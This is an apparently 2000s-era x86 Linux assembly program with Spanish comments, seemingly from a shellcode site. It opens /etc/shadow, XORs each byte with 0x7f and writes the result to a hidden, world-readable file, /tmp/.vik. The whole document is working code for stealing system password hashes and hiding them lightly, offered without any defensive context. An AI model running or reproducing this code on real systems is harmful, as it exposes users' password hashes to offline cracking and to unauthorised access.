; $Linux version 2.2.20 (root@mothership) (gcc version egcs-2.91.66 19990314/Linux (egcs-1.1.2 release)) 
; 
; s0t4ipv6@shellcode.com.ar
;
segment .text

global main

main:
	; C convencion
	push	ebp
	mov	ebp, esp
	sub	esp, 04h	; marco para nuestro caracter dinamico

	mov	ebx, temp
	mov	eax, 05h
	mov	ecx, 66h	; O_CREAT
	mov	edx, 1ffh	; en octal 777
	int	80h
	mov	[addr], eax
	mov	ebx,file
	mov	eax, 05h		; sys_open
	xor	ecx, ecx
	int	80h

; eax = 0x5 ebx = 0x80483c0 ecx = 0x2 edx = 0x2108b8

	xchg	ebx, eax
	xor	eax,eax
	xor	edx,edx
	mov	[ebp],eax	; quiero ceros en la pila
	inc	edx		; leo de 1 caracter por vez

lup:	lea	ecx, [buf]
	mov	byte al, 03h
	int	80h
	test	eax, eax
	jne	codeo

        mov     byte al, 06h    ; sys_close
        int     80h
        inc     eax             ; sys_exit
        int     80h
; eax = 0x0 ; ebx = 0x5 ; ecx = 0xbffffa0c ; edx = 0x1
codeo:
	push	ebx		; guardamos el valor del file descriptor viejo
	mov	byte al, [buf]
	xor	byte al, 7fh	; pea !!!!!!!!!!!!!!!!!
	mov	[buf], eax
	mov	ebx, [addr]
	mov	byte al, 04h
	int 	80h	
	pop	ebx		; recuperamos el fd
	jmp	lup

segment	.data
buf:	db	'0',0
file:	db	'/etc/shadow',0
temp:	db	'/tmp/.vik',0
addr:	dw	'0',0